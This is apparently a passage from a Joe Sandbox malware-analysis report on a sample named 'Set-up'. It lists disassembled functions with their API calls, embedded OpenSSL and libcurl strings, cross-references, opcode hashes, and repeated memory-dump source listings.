ASN1_mbstring_ncopy, xrefs: 00F24797, 00F247BC, 00F247E1, 00F24806, 00F24845, 00F24884, 00F2492C, 00F249DE, 00F24A35
crypto/asn1/a_mbstr.c, xrefs: 00F2479E, 00F247C3, 00F247E8, 00F2480D, 00F2484C, 00F2488B, 00F24933, 00F24A3F, 00F24A9D
minsize=%ld, xrefs: 00F2485A

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen
String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
API String ID: 39653677-2338284442
Opcode ID: 91e65cfbb06f48776b7adb9a4cae593e0e720d11db61aedc7508e3309e6845ad
Instruction ID: 05fff24bc035e52b41955a0260f24a5fa40a03202e3e1083e4858b93cec47ca1
Opcode Fuzzy Hash: 91e65cfbb06f48776b7adb9a4cae593e0e720d11db61aedc7508e3309e6845ad
Instruction Fuzzy Hash: 01A10972F483256BD3206E54BD42B2F77D0AB95B14F44442CFA99AB3C2D6F8F8009697

Function 00E72530 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 306COMMON

Download Yara Rule

Strings

.%lu, xrefs: 00E72761
crypto/objects/obj_dat.c, xrefs: 00E72810

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: .%lu$crypto/objects/obj_dat.c
API String ID: 0-3322715555
Opcode ID: 1697b576be4f74a1624274413c71998404571e54ad6f18ad3ecb7c73f5fd7936
Instruction ID: 46ed68d75f8d09c88e14b5cecc8c6c2af5bb573e5af512c51b1046a436975a62
Opcode Fuzzy Hash: 1697b576be4f74a1624274413c71998404571e54ad6f18ad3ecb7c73f5fd7936
Instruction Fuzzy Hash: 57A1D3B1A083019BE7149E25995072BB7E5AFD0708F18E92EEE8CA7341EB71DC059793

Function 00C9E300 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 283COMMON

Download Yara Rule

Strings

cannot mix POSTFIELDS with RESUME_FROM, xrefs: 00C9E3C1
transfer.c, xrefs: 00C9E331, 00C9E364, 00C9E479, 00C9E59A, 00C9E5E4, 00C9E70D, 00C9E729
No URL set, xrefs: 00C9E393
User-Agent: %s, xrefs: 00C9E60C

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
API String ID: 0-950935550
Opcode ID: 84f96b0316bfa1c00e43972e80af8c90ea7d4f1aa3caaeeb7c4871b291a9ac98
Instruction ID: cd2a7e0484573d463f8fd9fce945267e4b98c78f5450a006eb36dd06c6f38b5f
Opcode Fuzzy Hash: 84f96b0316bfa1c00e43972e80af8c90ea7d4f1aa3caaeeb7c4871b291a9ac98
Instruction Fuzzy Hash: DCB1D5B5B00A02ABEB29DB74DC49BA6F7A0BF51315F04032DE52C92281F731B564DBD6

Function 00DDA210 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DDA37F

Strings

QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 00DDA310
ssl/quic/quic_channel.c, xrefs: 00DDA2E3, 00DDA3BA
QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 00DDA3D5
ossl_quic_channel_raise_protocol_error_loc, xrefs: 00DDA2D9, 00DDA3B0

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen
String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
API String ID: 39653677-1084217658
Opcode ID: 3816d7757cece1490ee7eeac836f8d04de5861156e626e9e017656a2f854476c
Instruction ID: fe815627e1175256edc7963046b4e9547834f8a33ea12bf2b82f64375c568355
Opcode Fuzzy Hash: 3816d7757cece1490ee7eeac836f8d04de5861156e626e9e017656a2f854476c
Instruction Fuzzy Hash: BC5181F1A14345ABDF50DF69D882E9B7BE5BF88354F044929FD88E7201E631D910CBA2

Function 01006250 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00D50E3B,?,?,00000000,?), ref: 010063E9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00D50E3B,?,?,00000000,?), ref: 010063FB

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: de86923099d03f4715ba6b7914e2cefdd2cad2b39e6b0881e45599f5308ad7df
Instruction ID: d06519c5e72e47525901aded0413f58d89b1896f506285f7924d6704a04139a4
Opcode Fuzzy Hash: de86923099d03f4715ba6b7914e2cefdd2cad2b39e6b0881e45599f5308ad7df
Instruction Fuzzy Hash: D741C671A043119BF7069F6D9880B6F77EAAF94614F09843DE8C9C7281E776EC2487D2

Function 00E367F0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E3691C

Strings

error:%08lX:%s:%s:%s, xrefs: 00E368FE
lib(%lu), xrefs: 00E3689A
reason(%lu), xrefs: 00E368E1
err:%lx:%lx:%lx:%lx, xrefs: 00E36933

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen
String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
API String ID: 39653677-804487489
Opcode ID: 1df422a73b9deb48ec75a23c75c6706b485b3041d829bfbe6b5f5a3637632523
Instruction ID: 92820cb72935af940d52edab4acedbb9a85b011f8a860c730b1241162dc1bcdc
Opcode Fuzzy Hash: 1df422a73b9deb48ec75a23c75c6706b485b3041d829bfbe6b5f5a3637632523
Instruction Fuzzy Hash: 05312DB2A0430077F7216925AC4ABA77ADC9F94348F045438FD4C76287FA71ED54C261

Function 00FCA340 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 106stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00FCABB9), ref: 00FCA34E

Part of subcall function 00E5E270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00E5E28D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00FCABB9), ref: 00FCA446

Strings

.conf, xrefs: 00FCA376
crypto/conf/conf_def.c, xrefs: 00FCA3B9, 00FCA410
.cnf, xrefs: 00FCA38E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$_errno
String ID: .cnf$.conf$crypto/conf/conf_def.c
API String ID: 3066963124-3060939390
Opcode ID: 1e5d0506809f133e3bb5c845e1a445078e56034d8fa10fbee7e1971ef4484ac7
Instruction ID: 5f17b002cc119698fdc0fcff55f1764f03d884d74a2c1061509c726076a583e7
Opcode Fuzzy Hash: 1e5d0506809f133e3bb5c845e1a445078e56034d8fa10fbee7e1971ef4484ac7
Instruction Fuzzy Hash: 6D21F7E2E0420667DA147A31AD43F2B36CC9F6235DF080C3DFD4595292F666EE489263

Function 00E10870 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,00E5F556,00000000,FFFFFFFF,00000000,?,00000000,00E606DF,?), ref: 00E108D7
memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,00DD973B), ref: 00E10977

Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8

Strings

BUF_MEM_grow, xrefs: 00E1089A
crypto/buffer/buffer.c, xrefs: 00E108A1, 00E108FC, 00E10911, 00E10946

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memsetstrcpystrlen
String ID: BUF_MEM_grow$crypto/buffer/buffer.c
API String ID: 1298912638-2735992530
Opcode ID: ac5e0d5766fd49d90b5ac8dd929e84500e0529850717ff7e6db7341fd5f4bca6
Instruction ID: 67b86eb752e5aa5effd36622fa044de8fe17891ce19d2712ac554fd75cb7f090
Opcode Fuzzy Hash: ac5e0d5766fd49d90b5ac8dd929e84500e0529850717ff7e6db7341fd5f4bca6
Instruction Fuzzy Hash: 8B314DB1A042067BE310AA209C52FABB798ABC0754F148525FC58B73C3E7B0DCD487D1

Function 010066C0 Relevance: 7.6, APIs: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01007850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,010066E9,?,?,?,?,?,?,?,?,?,?,?), ref: 0100787B

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 010066F5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,013228AC,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006714
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006727
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01006776
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 010067CC

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errno$strcmp
String ID:
API String ID: 3909137471-0
Opcode ID: 30578fac5985fbc7203ba1f04b860051f066cedf0905b6caae6cc7887362dbbd
Instruction ID: bc45d71b3d7c5bdde86d17fd9058e7b722aa630fb8f379999ae8164690965cce
Opcode Fuzzy Hash: 30578fac5985fbc7203ba1f04b860051f066cedf0905b6caae6cc7887362dbbd
Instruction Fuzzy Hash: 73319535600201DFEB129FA8DC44A5A77EABF49224F444568F9DC97392F732EE21C751

Function 00E62010 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00E62704,00000008), ref: 00E6204D

Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00E62704,00000008), ref: 00E620C3

Strings

copy_integer, xrefs: 00E620DA
general_set_int, xrefs: 00E62086
crypto/params.c, xrefs: 00E62090, 00E620E4

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$general_set_int
API String ID: 2323844366-2562949257
Opcode ID: 6404e7e52bba2a3455ff196a94fb404e3d1633a75d7bc0005c86b2036687eb10
Instruction ID: 877706fbf7858a2f6274d51777df304e9bd30ad97e85057f5eaead9b8e62600d
Opcode Fuzzy Hash: 6404e7e52bba2a3455ff196a94fb404e3d1633a75d7bc0005c86b2036687eb10
Instruction Fuzzy Hash: 362160B4B8CB045BD2706628BC86F7777C8DB45348F14503DFB48B62C3E562AC45C261

Function 00E62140 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00E6299E,00000008), ref: 00E621A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00E6299E,00000008), ref: 00E621FE

Part of subcall function 00E640A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00E62075,?,?,?,?,?,?,00E62704,00000008), ref: 00E640C1
Part of subcall function 00E640A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00E62075,?,?,?,?,?,?,00E62704,00000008), ref: 00E6411E

Strings

general_get_uint, xrefs: 00E62176, 00E621BA
copy_integer, xrefs: 00E62214
crypto/params.c, xrefs: 00E62180, 00E621C4, 00E6221E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
